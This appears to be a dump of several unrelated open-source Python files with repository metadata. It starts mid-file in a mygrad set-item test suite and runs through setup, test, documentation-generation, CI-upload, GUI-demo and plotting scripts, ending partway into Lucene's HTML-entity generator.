def __init__(
self,
array_strat: st.SearchStrategy[np.ndarray],
index_strat: Callable[[np.ndarray], st.SearchStrategy],
value_strat: Callable[[np.ndarray], st.SearchStrategy[np.ndarray]],
):
self.array_strat = array_strat
self.index_strat = index_strat
self.value_strat = value_strat
def __call__(self, f: Callable) -> Callable[[], None]:
"""Wraps an empty function to populate it with the test function"""
@given(x=self.array_strat, data=st.data())
def wrapper(x: np.ndarray, data: st.DataObject):
index = data.draw(self.index_strat(x), label="index")
try:
o = np.asarray(x[index])
except IndexError:
assume(False)
return
note(f"x[index]: {o}")
y = data.draw(self.value_strat(o), label="y")
numpy_x = np.copy(x)
numpy_y = np.copy(y)
mygrad_x = Tensor(np.copy(x))
mygrad_y = Tensor(np.copy(y))
mygrad_x1 = +mygrad_x
try:
numpy_x[index] = numpy_y # don't permit invalid set-items
except Exception:
assume(False)
return
grad = data.draw(
hnp.arrays(
shape=x.shape, dtype=float, elements=st.floats(1, 10), unique=True
),
label="grad",
)
mygrad_x1[index] = mygrad_y
out = (mygrad_x1 * grad).sum() # type: Tensor
out.backward()
assert_allclose(
mygrad_y.data,
numpy_y,
err_msg="After `x[index] = y`, tensor-y does not match numpy-y",
)
dx, dy = numerical_gradient_full(
setitem, x, y, back_grad=grad, kwargs=dict(index=index)
)
assert_allclose(
mygrad_x1.grad,
grad,
err_msg="After `x[index] = y`, x.grad does not match the expected numerical gradient",
)
assert_allclose(
mygrad_x.grad,
dx,
err_msg="After `x[index] = y`, x.grad does not match the expected numerical gradient",
)
assert_allclose(
mygrad_y.grad,
dy,
err_msg="After `x[index] = y`, y.grad does not match the expected numerical gradient",
)
assert not mygrad_y._ops
assert not mygrad_x._ops
assert not mygrad_x1._ops
return wrapper
def test_setitem_multiple_input():
"""
Ensures proper backprop through computational graph
in which variable that is set on serves as multiple
inputs to a single operation.
Ensures that clear-graph works properly.
"""
from mygrad import add_sequence
x = Tensor([1.0])
y = x + 0
assert_array_equal(y.data, np.array([1.0]))
o = add_sequence(y, y, y)
y[0] = 4
assert_array_equal(y.data, np.array([4.0]))
f = o * y # 3 * 4
f.backward()
assert_array_equal(o.data, np.array([3.0]))
assert_array_equal(f.data, np.array([12.0]))
assert_array_equal(x.grad, np.array([12.0]))
assert_array_equal(o.grad, np.array([4.0]))
assert_array_equal(y.grad, np.array([3.0]))
assert not x._ops
assert not y._ops
assert not o._ops
assert not f._ops
@given(x_constant=st.booleans(), y_constant=st.booleans(), data=st.data())
def test_setitem_sanity_check(x_constant, y_constant, data):
"""Ensure proper setitem behavior for all combinations of constant/variable Tensors"""
x = Tensor([1.0, 2.0, 3.0, 4.0], constant=x_constant)
w = 4 * x
as_tensor = data.draw(st.booleans()) if y_constant else True
y = Tensor([1.0, 0.0], constant=y_constant) if as_tensor else np.array([1.0, 0.0])
w[::2] = np.array([-1.0, -2.0]) * y
assert_allclose(np.array((-1.0, 8.0, 0.0, 16.0)), w.data)
w.sum().backward()
assert isinstance(w, Tensor)
assert_allclose(w.data, np.array([-1.0, 8.0, 0.0, 16.0]))
if not w.constant:
assert w.grad is not None
assert_allclose(w.grad, np.ones_like(w.data))
assert w.constant is x.constant
if x.constant:
pass
assert x.grad is None
else:
assert_allclose(x.grad, np.array([0.0, 4.0, 0.0, 4.0]))
if as_tensor:
if w.constant or y.constant:
assert y.grad is None
else:
assert_allclose(y.grad, np.array([-1.0, -2.0]))
assert not w._ops, "clear-graph with clear-graph failed"
assert not x._ops, "clear-graph with clear-graph failed"
if as_tensor:
assert not y._ops, "clear-graph failed"
def test_setitem_downstream_doesnt_affect_upstream_backprop():
"""Test that upstream computational graph is not affected by downstream set-item"""
x = Tensor([1.0, 2.0, 3.0, 4.0])
y = Tensor([-1.0, -2.0, -3.0, -4.0])
z = x * y
y[:] = 0
z.backward()
assert_allclose(np.ones_like(z.data), z.grad, err_msg=f"{type(z.grad)}")
assert_allclose(np.array([-1.0, -2.0, -3.0, -4.0]), x.grad)
assert_allclose(np.array([0.0, 0.0, 0.0, 0.0]), y.data)
assert y.grad is None
@pytest.mark.parametrize("x_constant", [True, False])
@pytest.mark.parametrize("y_constant", [True, False])
def test_setitem_doesnt_mutate_upstream_nodes(x_constant: bool, y_constant: bool):
"""Ensure setitem doesn't mutate variable non-constant tensor"""
x = Tensor([1.0, 2.0], constant=x_constant)
y = Tensor([3.0, 4.0], constant=y_constant)
z = x + y
y[:] = 0
y_old = z.creator.variables[-1] # version of y that participated in x + y
assert_allclose(np.array([3.0, 4.0]), y_old)
assert_allclose(np.array([0.0, 0.0]), y)
@settings(deadline=None, max_examples=1000)
@set_item_test_factory(
array_strat=hnp.arrays(
shape=hnp.array_shapes(min_side=0, max_side=4, min_dims=0, max_dims=5),
dtype=float,
elements=st.floats(-10.0, 10.0),
),
index_strat=lambda x: basic_indices(x.shape),
value_strat=lambda o: (
hnp.arrays(
# Permit shapes that are broadcast-compatible with x[index]
# The only excess dimensions permitted in this shape are
# leading singletons
shape=broadcastable_shapes(o.shape).map(
lambda _x: tuple(
1 if (len(_x) - n) > o.ndim else s for n, s in enumerate(_x)
)
),
dtype=float,
elements=st.floats(-10.0, 10.0),
)
if o.shape and o.size
else st.floats(-10.0, 10.0).map(np.array)
),
)
def test_setitem_basic_index():
pass
@settings(deadline=None)
@set_item_test_factory(
array_strat=hnp.arrays(
shape=hnp.array_shapes(max_side=4, max_dims=5),
dtype=float,
elements=st.floats(-10.0, 10.0),
),
index_strat=lambda x: adv_integer_index(x.shape),
value_strat=lambda o: (
hnp.arrays(
shape=broadcastable_shapes(o.shape, max_dims=o.ndim, max_side=max(o.shape)),
dtype=float,
elements=st.floats(-10.0, 10.0),
)
if o.shape and o.size
else st.floats(-10.0, 10.0).map(np.asarray)
),
)
def test_setitem_adv_int_index():
pass
@settings(deadline=None)
@set_item_test_factory(
array_strat=hnp.arrays(
shape=hnp.array_shapes(max_side=4, max_dims=5),
dtype=float,
elements=st.floats(-10.0, 10.0),
),
index_strat=lambda x: hnp.arrays(shape=x.shape, dtype=bool),
value_strat=lambda o: (
hnp.arrays(
shape=broadcastable_shapes(o.shape, max_dims=o.ndim, max_side=max(o.shape)),
dtype=float,
elements=st.floats(-10.0, 10.0),
)
if o.shape and o.size
else st.floats(-10.0, 10.0).map(np.asarray)
),
)
def test_setitem_adv_bool_index():
pass
rows = np.array([0, 3], dtype=np.intp)
columns = np.array([0, 2], dtype=np.intp)
index = np.ix_(rows, columns)
@settings(deadline=None)
@set_item_test_factory(
array_strat=hnp.arrays(shape=(4, 3), dtype=float, elements=st.floats(-10.0, 10.0)),
index_strat=lambda x: st.just(index),
value_strat=lambda o: hnp.arrays(
shape=broadcastable_shapes(o.shape, max_dims=o.ndim),
dtype=float,
elements=st.floats(-10.0, 10.0),
),
)
def test_setitem_broadcast_index():
pass
@settings(deadline=None)
@set_item_test_factory(
array_strat=hnp.arrays(shape=(4, 3), dtype=float, elements=st.floats(-10.0, 10.0)),
index_strat=lambda x: st.just((slice(1, 2), [1, 2])),
value_strat=lambda o: hnp.arrays(
shape=broadcastable_shapes(o.shape, max_dims=o.ndim),
dtype=float,
elements=st.floats(-10.0, 10.0),
),
)
def test_setitem_mixed_index():
pass
rows2 = np.array([False, True, False, True])
columns2 = np.array([0, 2], dtype=np.intp)
index2 = (rows2, columns2)
@settings(deadline=None)
@set_item_test_factory(
array_strat=hnp.arrays(shape=(4, 3), dtype=float, elements=st.floats(-10.0, 10.0)),
index_strat=lambda x: st.just(index2),
value_strat=lambda o: hnp.arrays(
shape=broadcastable_shapes(o.shape, max_dims=o.ndim),
dtype=float,
elements=st.floats(-10.0, 10.0),
),
)
def test_setitem_broadcast_bool_index():
"""index mixes boolean and int-array indexing"""
@settings(deadline=None)
@set_item_test_factory(
array_strat=hnp.arrays(shape=(4, 3), dtype=float, elements=st.floats(-10.0, 10.0)),
index_strat=lambda x: st.just(
(np.array([False, True, False, True]), np.newaxis, slice(None))
),
value_strat=lambda o: hnp.arrays(
shape=broadcastable_shapes(o.shape, max_dims=o.ndim),
dtype=float,
elements=st.floats(-10.0, 10.0),
),
)
def test_setitem_bool_basic_index():
"""index mixes boolean and basic indexing"""
@settings(deadline=None)
@set_item_test_factory(
array_strat=hnp.arrays(shape=(3, 3), dtype=float, elements=st.floats(-10.0, 10.0)),
index_strat=lambda x: hnp.arrays(shape=(2, 3), dtype=bool).map(
lambda _x: (_x[0], _x[1])
),
value_strat=lambda o: hnp.arrays(
shape=broadcastable_shapes(o.shape, max_dims=o.ndim, max_side=max(o.shape)),
dtype=float,
elements=st.floats(-10.0, 10.0),
)
if o.shape and o.size
else st.floats(-10.0, 10.0).map(np.asarray),
)
def test_setitem_bool_axes_index():
"""index consists of boolean arrays specified for each axis"""
@settings(deadline=None, max_examples=1000)
@set_item_test_factory(
array_strat=hnp.arrays(
shape=hnp.array_shapes(min_side=0, max_side=4, min_dims=0, max_dims=5),
dtype=float,
elements=st.floats(-10.0, 10.0),
),
index_strat=lambda x: arbitrary_indices(x.shape),
value_strat=lambda o: (
hnp.arrays(
# Permit shapes that are broadcast-compatible with x[index]
# The only excess dimensions permitted in this shape are
# leading singletons
shape=broadcastable_shapes(o.shape).map(
lambda _x: tuple(
1 if (len(_x) - n) > o.ndim else s for n, s in enumerate(_x)
)
),
dtype=float,
elements=st.floats(-10.0, 10.0),
)
if o.shape and o.size
else st.floats(-10.0, 10.0).map(np.array)
),
)
def test_setitem_arbitrary_index():
"""test arbitrary indices"""
|
08fe92f49972cbee2588fc5676ca295281440676
|
f80ef3a3cf859b13e8af8433af549b6b1043bf6e
|
/pyobjc-framework-SyncServices/setup.py
|
292225ff39d57b0dfa610d569ef6da1b7f829d6b
|
[
"MIT"
] |
permissive
|
ronaldoussoren/pyobjc
|
29dc9ca0af838a56105a9ddd62fb38ec415f0b86
|
77b98382e52818690449111cd2e23cd469b53cf5
|
refs/heads/master
| 2023-09-01T05:15:21.814504
| 2023-06-13T20:00:17
| 2023-06-13T20:00:17
| 243,933,900
| 439
| 49
| null | 2023-06-25T02:49:07
| 2020-02-29T08:43:12
|
Python
|
UTF-8
|
Python
| false
| false
| 1,563
|
py
|
setup.py
|
"""
Wrappers for the "SyncServices" framework on macOS.
Sync Services is a framework containing all the components you need
to sync your applications and devices. If your application uses
Sync Services, user data can be synced with other applications and
devices on the same computer, or other computers over the network via
MobileMe.
These wrappers don't include documentation, please check Apple's documentation
for information on how to use this framework and PyObjC's documentation
for general tips and tricks regarding the translation between Python
and (Objective-)C frameworks
"""
import os
import sys
sys.path.insert(0, os.path.dirname(__file__))
from pyobjc_setup import Extension, setup # noqa: E402
VERSION = "9.2.1"
setup(
name="pyobjc-framework-SyncServices",
description="Wrappers for the framework SyncServices on macOS",
packages=["SyncServices"],
ext_modules=[
Extension(
"SyncServices._SyncServices",
["Modules/_SyncServices.m"],
extra_link_args=["-framework", "SyncServices"],
py_limited_api=True,
depends=[
os.path.join("Modules", fn)
for fn in os.listdir("Modules")
if fn.startswith("_SyncServices")
],
)
],
version=VERSION,
install_requires=[
"pyobjc-core>=" + VERSION,
"pyobjc-framework-Cocoa>=" + VERSION,
"pyobjc-framework-CoreData>=" + VERSION,
],
long_description=__doc__,
options={"bdist_wheel": {"py_limited_api": "cp36"}},
)
|
8c8498ff8e5aef8971c41f41616dd455acbecb6f
|
bd2509c33e0336d21013e0cf20d6c1b3a40ac62f
|
/docs.py
|
87592fd78fdb7d20a07069f82c27459f3a668ab2
|
[
"MIT"
] |
permissive
|
alexander-akhmetov/python-shortcuts
|
ee12e7dbcfbdef7a4d5816fd2fdd3f9771b88120
|
41e8ea87a0058606052714b9755a4b4f47d3a276
|
refs/heads/master
| 2023-07-02T16:23:38.914324
| 2022-01-02T11:29:49
| 2022-01-02T11:29:49
| 150,023,351
| 660
| 39
|
MIT
| 2023-08-30T01:00:39
| 2018-09-23T20:35:50
|
Python
|
UTF-8
|
Python
| false
| false
| 2,520
|
py
|
docs.py
|
'''
Generates documentation for all available actions in the shortcuts.actions module
'''
import argparse
from shortcuts.actions import actions_registry
from shortcuts.actions.base import VariablesField
DOC_TEMPLATE = '''
# Supported Actions
This is a list of all actions supported by **python-shortcuts**.
Legend:
* *keyword*: This keyword you can use in `toml` files to describe action
* *shortcuts identifier*: (*itype*) this identifier will be used to generate an action in a shortcut
System variables:
* `{{{{ask_when_run}}}}` - ask the user for an input when the shortcut is running.
----
{actions}
'''
def _build_docs():
actions_docs = []
actions_docs = [_build_action_doc(a) for a in actions_registry.actions]
return DOC_TEMPLATE.format(actions='\n\n'.join(actions_docs))
ACTION_TEMPLATE = '''
### {name}
{doc}
**keyword**: `{keyword}`
**shortcuts identifier**: `{identifier}`
{params}
'''
def _build_action_doc(action):
params = '\n'.join([_build_params_doc(f) for f in action().fields]).strip()
params = f'params:\n\n{params}' if params else ''
doc = ''
if action.__doc__:
# remove spaces from the beginning of _each_ line
doc = '\n'.join([l.strip() for l in action.__doc__.splitlines()])
return ACTION_TEMPLATE.format(
name=action.__name__,
doc=doc,
keyword=action.keyword,
identifier=action.itype,
params=params,
).strip()
PARAM_TEMPLATE = '* {name} {opts}'
def _build_params_doc(field):
properties = ', '.join(_get_field_properties(field))
opts = f'({properties})'
choices = getattr(field, 'choices', None)
if choices:
opts += f' {field.help} | _choices_:\n'
opts += '\n'.join([f'\n * `{choice}`' for choice in choices])
return PARAM_TEMPLATE.format(
name=field._attr,
opts=opts,
help=field.help,
).strip()
def _get_field_properties(field):
properties = []
if field.required:
properties.append('*required*')
if field.default:
properties.append(f'default={field.default}')
if isinstance(field, VariablesField):
properties.append('*variables support*')
return properties
def main():
parser = argparse.ArgumentParser(description='Actions documentation generator')
parser.add_argument('output', help='output file')
args = parser.parse_args()
doc = _build_docs()
with open(args.output, 'w') as f:
f.write(doc)
if __name__ == '__main__':
main()
|
10907270c790815044f954bfb26c6df232e42d81
|
d668209e9951d249020765c011a836f193004c01
|
/tools/pnnx/tests/test_F_grid_sample.py
|
8cb6d214568c669ba954780f801e8d50bd8df26f
|
[
"BSD-3-Clause",
"Zlib",
"BSD-2-Clause"
] |
permissive
|
Tencent/ncnn
|
d8371746c00439304c279041647362a723330a79
|
14b000d2b739bd0f169a9ccfeb042da06fa0a84a
|
refs/heads/master
| 2023-08-31T14:04:36.635201
| 2023-08-31T04:19:23
| 2023-08-31T04:19:23
| 95,879,426
| 18,818
| 4,491
|
NOASSERTION
| 2023-09-14T15:44:56
| 2017-06-30T10:55:37
|
C++
|
UTF-8
|
Python
| false
| false
| 4,794
|
py
|
test_F_grid_sample.py
|
# Tencent is pleased to support the open source community by making ncnn available.
#
# Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
import torch
import torch.nn as nn
import torch.nn.functional as F
class Model(nn.Module):
def __init__(self):
super(Model, self).__init__()
def forward(self, x, xg1, xg2, y, yg1, yg2):
# norm to -1 ~ 1
xg1 = xg1 * 2 - 1
xg2 = xg2 * 2 - 1
yg1 = yg1 * 2 - 1
yg2 = yg2 * 2 - 1
x = F.grid_sample(x, xg1, mode='bilinear', padding_mode='zeros', align_corners=False)
x = F.grid_sample(x, xg2, mode='bilinear', padding_mode='border', align_corners=False)
x = F.grid_sample(x, xg1, mode='bilinear', padding_mode='reflection', align_corners=False)
x = F.grid_sample(x, xg2, mode='nearest', padding_mode='zeros', align_corners=False)
x = F.grid_sample(x, xg1, mode='nearest', padding_mode='border', align_corners=False)
x = F.grid_sample(x, xg2, mode='nearest', padding_mode='reflection', align_corners=False)
x = F.grid_sample(x, xg1, mode='bicubic', padding_mode='zeros', align_corners=False)
x = F.grid_sample(x, xg2, mode='bicubic', padding_mode='border', align_corners=False)
x = F.grid_sample(x, xg1, mode='bicubic', padding_mode='reflection', align_corners=False)
x = F.grid_sample(x, xg2, mode='bilinear', padding_mode='zeros', align_corners=True)
x = F.grid_sample(x, xg1, mode='bilinear', padding_mode='border', align_corners=True)
x = F.grid_sample(x, xg2, mode='bilinear', padding_mode='reflection', align_corners=True)
x = F.grid_sample(x, xg1, mode='nearest', padding_mode='zeros', align_corners=True)
x = F.grid_sample(x, xg2, mode='nearest', padding_mode='border', align_corners=True)
x = F.grid_sample(x, xg1, mode='nearest', padding_mode='reflection', align_corners=True)
x = F.grid_sample(x, xg2, mode='bicubic', padding_mode='zeros', align_corners=True)
x = F.grid_sample(x, xg1, mode='bicubic', padding_mode='border', align_corners=True)
x = F.grid_sample(x, xg2, mode='bicubic', padding_mode='reflection', align_corners=True)
y = F.grid_sample(y, yg1, mode='bilinear', padding_mode='zeros', align_corners=False)
y = F.grid_sample(y, yg2, mode='bilinear', padding_mode='border', align_corners=False)
y = F.grid_sample(y, yg1, mode='bilinear', padding_mode='reflection', align_corners=False)
y = F.grid_sample(y, yg2, mode='nearest', padding_mode='zeros', align_corners=False)
y = F.grid_sample(y, yg1, mode='nearest', padding_mode='border', align_corners=False)
y = F.grid_sample(y, yg2, mode='nearest', padding_mode='reflection', align_corners=False)
y = F.grid_sample(y, yg1, mode='bilinear', padding_mode='zeros', align_corners=True)
y = F.grid_sample(y, yg2, mode='bilinear', padding_mode='border', align_corners=True)
y = F.grid_sample(y, yg1, mode='bilinear', padding_mode='reflection', align_corners=True)
y = F.grid_sample(y, yg2, mode='nearest', padding_mode='zeros', align_corners=True)
y = F.grid_sample(y, yg1, mode='nearest', padding_mode='border', align_corners=True)
y = F.grid_sample(y, yg2, mode='nearest', padding_mode='reflection', align_corners=True)
return x, y
def test():
net = Model()
net.eval()
torch.manual_seed(0)
x = torch.rand(1, 3, 12, 16)
xg1 = torch.rand(1, 21, 27, 2)
xg2 = torch.rand(1, 12, 16, 2)
y = torch.rand(1, 5, 10, 12, 16)
yg1 = torch.rand(1, 10, 21, 27, 3)
yg2 = torch.rand(1, 10, 12, 16, 3)
a0, a1 = net(x, xg1, xg2, y, yg1, yg2)
# export torchscript
mod = torch.jit.trace(net, (x, xg1, xg2, y, yg1, yg2))
mod.save("test_F_grid_sample.pt")
# torchscript to pnnx
import os
os.system("../src/pnnx test_F_grid_sample.pt inputshape=[1,3,12,16],[1,21,27,2],[1,12,16,2],[1,5,10,12,16],[1,10,21,27,3],[1,10,12,16,3]")
# pnnx inference
import test_F_grid_sample_pnnx
b0, b1 = test_F_grid_sample_pnnx.test_inference()
return torch.equal(a0, b0) and torch.equal(a1, b1)
if __name__ == "__main__":
if test():
exit(0)
else:
exit(1)
|
7c5ea1476d385ed8cdcbf04f187019fb7bf63348
|
afd2087e80478010d9df66e78280f75e1ff17d45
|
/tools/stats/upload_artifacts.py
|
eb0fde7f38ac2904d4ac68f412b4d3e40057bcda
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-secret-labs-2011",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
] |
permissive
|
pytorch/pytorch
|
7521ac50c47d18b916ae47a6592c4646c2cb69b5
|
a6f7dd4707ac116c0f5fb5f44f42429f38d23ab4
|
refs/heads/main
| 2023-08-03T05:05:02.822937
| 2023-08-03T00:40:33
| 2023-08-03T04:14:52
| 65,600,975
| 77,092
| 24,610
|
NOASSERTION
| 2023-09-14T21:58:39
| 2016-08-13T05:26:41
|
Python
|
UTF-8
|
Python
| false
| false
| 2,063
|
py
|
upload_artifacts.py
|
import argparse
import os
import re
from tempfile import TemporaryDirectory
from tools.stats.upload_stats_lib import download_gha_artifacts, upload_file_to_s3
ARTIFACTS = [
"sccache-stats",
"test-jsons",
"test-reports",
"usage-log",
]
BUCKET_NAME = "gha-artifacts"
FILENAME_REGEX = r"-runattempt\d+"
def get_artifacts(repo: str, workflow_run_id: int, workflow_run_attempt: int) -> None:
with TemporaryDirectory() as temp_dir:
print("Using temporary directory:", temp_dir)
os.chdir(temp_dir)
for artifact in ARTIFACTS:
artifact_paths = download_gha_artifacts(
artifact, workflow_run_id, workflow_run_attempt
)
for artifact_path in artifact_paths:
# GHA artifact is named as follows: NAME-runattempt${{ github.run_attempt }}-SUFFIX.zip
# and we want remove the run_attempt to conform with the naming convention on S3, i.e.
# pytorch/pytorch/WORKFLOW_ID/RUN_ATTEMPT/artifact/NAME-SUFFIX.zip
s3_filename = re.sub(FILENAME_REGEX, "", artifact_path.name)
upload_file_to_s3(
file_name=str(artifact_path.resolve()),
bucket=BUCKET_NAME,
key=f"{repo}/{workflow_run_id}/{workflow_run_attempt}/artifact/{s3_filename}",
)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Upload test artifacts from GHA to S3")
parser.add_argument(
"--workflow-run-id",
type=int,
required=True,
help="id of the workflow to get artifacts from",
)
parser.add_argument(
"--workflow-run-attempt",
type=int,
required=True,
help="which retry of the workflow this is",
)
parser.add_argument(
"--repo",
type=str,
required=True,
help="which GitHub repo this workflow run belongs to",
)
args = parser.parse_args()
get_artifacts(args.repo, args.workflow_run_id, args.workflow_run_attempt)
|
07a177466c75d8d6a6b997d6e9c9522f381b2d29
|
07ca66b6bc4d7a94ae78e6c622899458f1bb54fd
|
/sdk/python/feast/infra/materialization/contrib/bytewax/dataflow.py
|
e3d95e2a75cdc868ac8abf5a7e6b93ac78bd69fc
|
[
"Apache-2.0"
] |
permissive
|
feast-dev/feast
|
8136454dec73275d18133b96f74c3fec8abc57e8
|
58aff346832ebde1695a47cf724da3d65a4a8c53
|
refs/heads/master
| 2023-08-31T03:35:16.188051
| 2023-08-28T06:25:39
| 2023-08-28T06:25:39
| 161,133,770
| 3,956
| 754
|
Apache-2.0
| 2023-09-14T11:17:15
| 2018-12-10T07:20:15
|
Python
|
UTF-8
|
Python
| false
| false
| 728
|
py
|
dataflow.py
|
import yaml
from feast import FeatureStore, RepoConfig
from feast.infra.materialization.contrib.bytewax.bytewax_materialization_dataflow import (
BytewaxMaterializationDataflow,
)
if __name__ == "__main__":
with open("/var/feast/feature_store.yaml") as f:
feast_config = yaml.safe_load(f)
with open("/var/feast/bytewax_materialization_config.yaml") as b:
bytewax_config = yaml.safe_load(b)
config = RepoConfig(**feast_config)
store = FeatureStore(config=config)
job = BytewaxMaterializationDataflow(
config,
store.get_feature_view(bytewax_config["feature_view"]),
bytewax_config["paths"],
)
|
40f76d884f757668b12521ddf27187a9c0da3a85
|
55c5e55612f2d04294c02cec728729bdb1b323c8
|
/xianhuan/pysimplegui/demo.py
|
2a6d776956a05216a150aaed5f91d7becf169348
|
[] |
no_license
|
JustDoPython/python-examples
|
4efc9e3aafd533938b23012dbc72aeb175a87744
|
d4159751a86b1e9ce7867d0a7f1c12e8b8e0f213
|
refs/heads/master
| 2023-03-16T01:34:24.219119
| 2023-03-08T10:37:33
| 2023-03-08T10:37:33
| 249,331,676
| 423
| 423
| null | 2023-02-17T07:49:04
| 2020-03-23T04:00:26
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 576
|
py
|
demo.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author: 闲欢
"""
import PySimpleGUI as sg
layout = [
[sg.Text('一句话概括Python')],
[sg.Input(key='-INPUT111-')],
[sg.Input(key='-INPUT222-')],
[sg.Button('确认'), sg.Button('取消')],
[sg.Text('输出:'), sg.Text(key='-OUTPUT-')]
]
window = sg.Window('PySimpleGUI Demo', layout)
while True:
event, values = window.read()
print(event)
print(values)
if event in (None, '取消'):
break
else:
window['-OUTPUT-'].update(values['-INPUT222-'])
window.close()
|
d18e9d0002b84065c2f6bba5483ece47951cae62
|
a4cf941458c1c463da18f6286219a753ac74ede6
|
/vaspy/plotter.py
|
f5ad1a4a63a7c567290af8ee8b5da158b1aedb78
|
[
"MIT"
] |
permissive
|
PytLab/VASPy
|
d40926c614201225de0db7d50deb28b8b7d5cdba
|
a48bb43842bb87c07c6a4c7943b8d280e2e8889b
|
refs/heads/master
| 2022-07-04T21:07:25.646905
| 2022-06-19T13:15:41
| 2022-06-19T13:15:41
| 40,174,641
| 266
| 112
|
MIT
| 2022-06-19T13:15:42
| 2015-08-04T09:10:20
|
Python
|
UTF-8
|
Python
| false
| false
| 2,520
|
py
|
plotter.py
|
# -*- coding:utf-8 -*-
"""
========================================================================
Provide pure data file class which do operations on these files.
========================================================================
Written by PytLab <shaozhengjiang@gmail.com>, September 2015
Updated by PytLab <shaozhengjiang@gmail.com>, September 2015
========================================================================
"""
import numpy as np
# whether pyplot installed
try:
import matplotlib.pyplot as plt
plt_installed = True
except ImportError:
print('Warning: Module matplotlib.pyplot is not installed')
plt_installed = False
from vaspy.functions import line2list
class DataPlotter(object):
def __init__(self, filename, field=' ', dtype=float):
self.filename = filename
self.field = field
self.dtype = dtype
#load data
self.load()
def load(self):
"Load all data in file into array."
data = []
with open(self.filename, 'r') as f:
for line in f:
line = line.strip()
if not line: # blank line
continue
if not line[0].isdigit(): # comment line or not
if not line.startswith('-'):
continue
elif not line[1].isdigit() and line[1] != '.':
continue
linedata = line2list(line, field=self.field,
dtype=self.dtype)
data.append(linedata)
self.data = np.array(data)
return data
def plot2d(self, xcol, ycols):
"显示特定两列数据"
'''
Parameter
---------
xcol: int
column number of data for x values
ycols: tuple of int
column numbers of data for y values
(start, stop[, step])
Example:
>>> a.plot2d(0, (1, 3, 1))
'''
x = self.data[:, xcol]
fig = plt.figure()
ax = fig.add_subplot(111)
for i in range(*ycols):
y = self.data[:, i]
ax.plot(x, y, linewidth=3)
fig.show()
def plotall(self):
"将所有数据一起显示"
ncols = self.data.shape[1]
x = self.data[:, 0]
fig = plt.figure()
ax = fig.add_subplot(111)
for col in range(1, ncols):
y = self.data[:, col]
ax.plot(x, y, linewidth=3)
fig.show()
|
66e0238fed4e069addbbdb93179b1457fc3a5203
|
8d0207d19138ed986f40c4ddb7bbee67f8d9eb66
|
/gradle/generation/jflex/htmlentity.py
|
3eaf7acc5e52a38eaf780c72cad6d9d4a30fc179
|
[
"Apache-2.0",
"MIT",
"NAIST-2003",
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-unicode",
"LGPL-2.0-or-later",
"ICU",
"LicenseRef-scancode-unicode-mappings",
"CC-BY-SA-3.0",
"Python-2.0",
"LicenseRef-scancode-other-copyleft"
] |
permissive
|
apache/lucene
|
0a0121aaf8e6808cc859b2e91ef386660a702495
|
9fd45e3951d941edbe575d41d900af589bbbe5df
|
refs/heads/main
| 2023-09-04T02:17:05.678297
| 2023-09-01T18:05:49
| 2023-09-01T18:05:49
| 341,631,350
| 1,964
| 868
|
Apache-2.0
| 2023-09-14T16:20:46
| 2021-02-23T17:16:56
|
Java
|
UTF-8
|
Python
| false
| false
| 31,397
|
py
|
htmlentity.py
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import sys
# A simple python script to generate an HTML entity map and a regex alternation
# for inclusion in HTMLStripCharFilter.jflex.
def main():
with open(sys.argv[1], 'w') as f:
sys.stdout = f
print(get_apache_license())
codes = {}
regex = re.compile(r'\s*<!ENTITY\s+(\S+)\s+"&(?:#38;)?#(\d+);"')
for line in get_entity_text().split('\n'):
match = regex.match(line)
if match:
key = match.group(1)
if key == 'quot': codes[key] = r'\"'
elif key == 'nbsp': codes[key] = ' ';
else : codes[key] = r'\u%04X' % int(match.group(2))
keys = sorted(codes)
first_entry = True
output_line = 'CharacterEntities = ( '
for key in keys:
new_entry = ('"%s"' if first_entry else ' | "%s"') % key
first_entry = False
if len(output_line) + len(new_entry) >= 80:
print(output_line)
output_line = ' '
output_line += new_entry
if key in ('quot','copy','gt','lt','reg','amp'):
new_entry = ' | "%s"' % key.upper()
if len(output_line) + len(new_entry) >= 80:
print(output_line)
output_line = ' '
output_line += new_entry
print(output_line, ')')
print('%{')
print(' private static final Map<String,String> upperCaseVariantsAccepted')
print(' = new HashMap<>();')
print(' static {')
print(' upperCaseVariantsAccepted.put("quot", "QUOT");')
print(' upperCaseVariantsAccepted.put("copy", "COPY");')
print(' upperCaseVariantsAccepted.put("gt", "GT");')
print(' upperCaseVariantsAccepted.put("lt", "LT");')
print(' upperCaseVariantsAccepted.put("reg", "REG");')
print(' upperCaseVariantsAccepted.put("amp", "AMP");')
print(' }')
print(' private static final CharArrayMap<Character> entityValues')
print(' = new CharArrayMap<>(%i, false);' % len(keys))
print(' static {')
print(' String[] entities = {')
output_line = ' '
for key in keys:
new_entry = ' "%s", "%s",' % (key, codes[key])
if len(output_line) + len(new_entry) >= 80:
print(output_line)
output_line = ' '
output_line += new_entry
print(output_line[:-1])
print(' };')
print(' for (int i = 0 ; i < entities.length ; i += 2) {')
print(' Character value = entities[i + 1].charAt(0);')
print(' entityValues.put(entities[i], value);')
print(' String upperCaseVariant = upperCaseVariantsAccepted.get(entities[i]);')
print(' if (upperCaseVariant != null) {')
print(' entityValues.put(upperCaseVariant, value);')
print(' }')
print(' }')
print(" }")
print("%}")
def get_entity_text():
# The text below is taken verbatim from
# <http://www.w3.org/TR/REC-html40/sgml/entities.html>:
text = r"""
F.1. XHTML Character Entities
